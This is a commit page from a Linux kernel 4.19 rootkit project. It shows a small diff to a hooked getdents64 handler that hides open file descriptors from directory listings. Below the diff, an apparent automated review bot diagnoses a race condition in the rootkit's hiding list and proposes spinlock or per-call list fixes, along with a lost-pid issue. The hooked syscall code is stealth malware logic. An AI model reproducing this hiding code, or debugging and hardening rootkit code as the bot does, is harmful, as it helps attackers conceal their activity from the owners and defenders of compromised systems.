linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 5a8444a83fc6d1df17e42a9d39ef7d208cc6f3c2
parent 65326beeb178c63171971ae3e17ef187ae818f7b
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat,  5 Dec 2020 19:38:01 +0100

Clear list after every fd dir

Diffstat:
Msrc/hook.c | 3++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/src/hook.c b/src/hook.c
@@ -235,7 +235,7 @@ g7_getdents64(const struct pt_regs *pt_regs)
 if(rootkit.hiding_open_files && ((fd_pid = may_fd(dirfile)) != -1)) {
 is_fd = 1;
- fill_fds(fd_pid);
+ add_fd_to_list(&hidden_fds, 0);
 }
 for (offset = 0; offset < ret;) {
@@ -262,6 +262,7 @@ g7_getdents64(const struct pt_regs *pt_regs)
 atomic_dec(&getdents64_count);
 yield:
+ clear_hidden_fds();
 kfree(kdirent);
 return ret;
 }
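Review bot: Filling the global `hidden_fds` list per call and tearing it down with `clear_hidden_fds()` at `yield:` is a race if `g7_getdents64` can run on more than one CPU at once, which a syscall hook on 4.19 normally can: one task's `clear_hidden_fds()` can free entries another task is still walking in the hiding loop, and no lock is visible in either hunk (the atomic `getdents64_count` only protects the counter, not the list). Either make the list per-call (a `LIST_HEAD(hidden_fds)` local to the function handed to `add_fd_to_list`/`clear_hidden_fds`) or take a spinlock around the add, the walk and the clear, e.g. `spin_lock(&hidden_fds_lock);` before `add_fd_to_list(&hidden_fds, 0);` and `spin_unlock(&hidden_fds_lock);` after `clear_hidden_fds();`. Separately, the new `add_fd_to_list(&hidden_fds, 0)` discards the `fd_pid` that `may_fd(dirfile)` just returned, whereas the replaced `fill_fds(fd_pid)` consumed it; if the second argument is the pid whose fds are hidden this looks like a lost value, and if `0` is a deliberate placeholder a comment such as `/* placeholder; the real fd entries are added while walking the dirents */` would make that clear. Both hunks sit inside `g7_getdents64`, whose body starts and ends outside this diff, so the hiding loop that consumes the list is not visible here.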